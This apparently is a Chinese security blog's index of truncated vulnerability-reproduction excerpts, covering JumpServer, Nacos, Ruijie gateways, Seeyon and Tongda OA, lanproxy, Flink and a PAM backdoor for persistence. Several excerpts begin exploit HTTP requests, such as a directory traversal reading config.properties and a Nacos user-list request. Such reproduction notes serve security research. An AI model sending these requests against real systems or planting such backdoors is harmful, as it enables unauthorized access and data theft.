Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: we...
漏洞复现
jumpserver远程代码执行漏洞分析
一、获取Token 首先是找到那个修改bug 的点 https://github.com/jumpserver/jumpserver/commits/master 然后对比一下代码。 https://githistory.xyz/j...
JumpServer远程执行漏洞 复现
首先。安装 安装脚本V2.6.1 https://www.o2oxy.cn/wp-content/uploads/2021/01/quick_start.zip github 安装脚本全部是安装最新版的。 安装的时候注意几个坑。 ...
Nacos 未授权访问
用户列表size代表用户数量 GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1 Host: x.x.x.x User-Agent: Nacos-Server Connection: close ...
锐捷网关系列通杀GetShell
https://github.com/Tas9er/EgGateWayGetShell 使用jd-gui 解开 整理出POC 如下: POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: ...
致远OA 任意文件上传
老版本 POST /seeyon/pdfservlet HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0 Accept: text/html,application...
CVE-2020-3091 lanproxy 目录遍历
/../conf/config.properties GET /../conf/config.properties HTTP/1.1 Host: 192.168.10.10:881 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5...
Apache Flink CVE-2020-17519/CVE-2020-17518 漏洞复现
CVE-2020-17519 任意文件读取 https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 访问8081 端口 http:/...
内网技巧-Linux权限维持之PAM万能密码登录
原文地址:https://xz.aliyun.com/t/8618 试验环境:Centos8.2 pam版本1.3.1 [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 8.2.2004 (Core) [root@localhost ~]# r...
通达OA 后台SQL 注入
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest ...